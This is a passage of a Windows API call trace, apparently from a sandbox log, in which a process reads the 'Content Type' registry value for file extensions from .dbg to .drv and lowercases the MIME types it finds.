lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.854] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dbg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.854] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dbg", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.854] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.854] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dbs", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.854] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.854] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.854] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dct", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.854] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dct", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.855] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.855] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dctx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.855] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dctx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.855] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.855] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dctxc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.855] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dctxc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.855] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.855] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dds", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.855] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dds", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.855] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x22) returned 0x0 [0103.855] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24dc114, lpcbData=0x19fc20*=0x22 | out: lpType=0x19fc10*=0x1, lpData="image/vnd.ms-dds", lpcbData=0x19fc20*=0x22) returned 0x0 [0103.856] CharLowerBuffW (in: lpsz="image/vnd.ms-dds", cchLength=0x10 | out: lpsz="image/vnd.ms-dds") returned 0x10 [0103.856] CharLowerBuffW (in: lpsz=".dds", cchLength=0x4 | out: lpsz=".dds") returned 0x4 [0103.856] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".def", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.856] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".def", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.856] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.856] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".der", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.856] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".der", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.856] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x36) returned 0x0 [0103.856] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a6ec4, lpcbData=0x19fc20*=0x36 | out: lpType=0x19fc10*=0x1, lpData="application/x-x509-ca-cert", lpcbData=0x19fc20*=0x36) returned 0x0 [0103.856] CharLowerBuffW (in: lpsz="application/x-x509-ca-cert", cchLength=0x1a | out: lpsz="application/x-x509-ca-cert") returned 0x1a [0103.856] CharLowerBuffW (in: lpsz=".der", cchLength=0x4 | out: lpsz=".der") returned 0x4 [0103.856] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".desklink", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.856] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".desklink", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.857] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.857] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".deskthemepack", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.857] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".deskthemepack", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.857] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.857] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".det", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.857] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".det", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.857] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.857] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".diagcab", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.857] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".diagcab", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.857] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.857] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".diagcfg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.858] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".diagcfg", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.858] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.858] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".diagpkg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.858] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".diagpkg", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.858] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.858] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dib", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.858] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dib", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.858] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.858] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aecc, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/bmp", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.858] CharLowerBuffW (in: lpsz="image/bmp", cchLength=0x9 | out: lpsz="image/bmp") returned 0x9 [0103.858] CharLowerBuffW (in: lpsz=".dib", cchLength=0x4 | out: lpsz=".dib") returned 0x4 [0103.859] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dic", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.859] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dic", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.859] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.859] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".divx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.859] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".divx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.859] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.859] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".diz", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.859] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".diz", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.859] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.859] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dll", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.859] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dll", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.860] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x32) returned 0x0 [0103.860] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23f854c, lpcbData=0x19fc20*=0x32 | out: lpType=0x19fc10*=0x1, lpData="application/x-msdownload", lpcbData=0x19fc20*=0x32) returned 0x0 [0103.860] CharLowerBuffW (in: lpsz="application/x-msdownload", cchLength=0x18 | out: lpsz="application/x-msdownload") returned 0x18 [0103.860] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0103.860] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dl_", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.860] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dl_", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.860] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.860] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dng", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.860] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dng", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.860] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.860] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249ae7c, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/DNG", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.860] CharLowerBuffW (in: lpsz="image/DNG", cchLength=0x9 | out: lpsz="image/dng") returned 0x9 [0103.861] CharLowerBuffW (in: lpsz=".dng", cchLength=0x4 | out: lpsz=".dng") returned 0x4 [0103.861] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.861] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".doc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.861] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x26) returned 0x0 [0103.861] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24d2474, lpcbData=0x19fc20*=0x26 | out: lpType=0x19fc10*=0x1, lpData="application/msword", lpcbData=0x19fc20*=0x26) returned 0x0 [0103.861] CharLowerBuffW (in: lpsz="application/msword", cchLength=0x12 | out: lpsz="application/msword") returned 0x12 [0103.861] CharLowerBuffW (in: lpsz=".doc", cchLength=0x4 | out: lpsz=".doc") returned 0x4 [0103.861] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dochtml", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.861] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dochtml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.861] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.861] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docm", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.861] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".docm", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.862] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x62) returned 0x0 [0103.862] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23feea4, lpcbData=0x19fc20*=0x62 | out: lpType=0x19fc10*=0x1, lpData="application/vnd.ms-word.document.macroEnabled.12", lpcbData=0x19fc20*=0x62) returned 0x0 [0103.862] CharLowerBuffW (in: lpsz="application/vnd.ms-word.document.macroEnabled.12", cchLength=0x30 | out: lpsz="application/vnd.ms-word.document.macroenabled.12") returned 0x30 [0103.862] CharLowerBuffW (in: lpsz=".docm", cchLength=0x5 | out: lpsz=".docm") returned 0x5 [0103.862] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docmhtml", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.862] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".docmhtml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.862] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.862] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.862] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".docx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.862] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x90) returned 0x0 [0103.862] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23ee45c, lpcbData=0x19fc20*=0x90 | out: lpType=0x19fc10*=0x1, lpData="application/vnd.openxmlformats-officedocument.wordprocessingml.document", lpcbData=0x19fc20*=0x90) returned 0x0 [0103.863] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.document", cchLength=0x47 | out: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.document") returned 0x47 [0103.863] CharLowerBuffW (in: lpsz=".docx", cchLength=0x5 | out: lpsz=".docx") returned 0x5 [0103.863] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docxml", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.863] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".docxml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.863] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.863] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dos", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.863] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dos", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.863] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.863] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dot", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.863] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dot", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.863] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x26) returned 0x0 [0103.864] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24dc114, lpcbData=0x19fc20*=0x26 | out: lpType=0x19fc10*=0x1, lpData="application/msword", lpcbData=0x19fc20*=0x26) returned 0x0 [0103.864] CharLowerBuffW (in: lpsz="application/msword", cchLength=0x12 | out: lpsz="application/msword") returned 0x12 [0103.864] CharLowerBuffW (in: lpsz=".dot", cchLength=0x4 | out: lpsz=".dot") returned 0x4 [0103.864] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dothtml", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.864] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dothtml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.864] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.864] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dotm", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.864] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dotm", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.864] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x62) returned 0x0 [0103.864] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23fef1c, lpcbData=0x19fc20*=0x62 | out: lpType=0x19fc10*=0x1, lpData="application/vnd.ms-word.template.macroEnabled.12", lpcbData=0x19fc20*=0x62) returned 0x0 [0103.864] CharLowerBuffW (in: lpsz="application/vnd.ms-word.template.macroEnabled.12", cchLength=0x30 | out: lpsz="application/vnd.ms-word.template.macroenabled.12") returned 0x30 [0103.864] CharLowerBuffW (in: lpsz=".dotm", cchLength=0x5 | out: lpsz=".dotm") returned 0x5 [0103.864] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dotx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.865] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dotx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.865] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x90) returned 0x0 [0103.865] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23ee45c, lpcbData=0x19fc20*=0x90 | out: lpType=0x19fc10*=0x1, lpData="application/vnd.openxmlformats-officedocument.wordprocessingml.template", lpcbData=0x19fc20*=0x90) returned 0x0 [0103.865] CharLowerBuffW (in: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.template", cchLength=0x47 | out: lpsz="application/vnd.openxmlformats-officedocument.wordprocessingml.template") returned 0x47 [0103.865] CharLowerBuffW (in: lpsz=".dotx", cchLength=0x5 | out: lpsz=".dotx") returned 0x5 [0103.865] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dqy", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.865] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dqy", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.865] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.865] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".drv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.865] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".drv", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.865] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.866] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 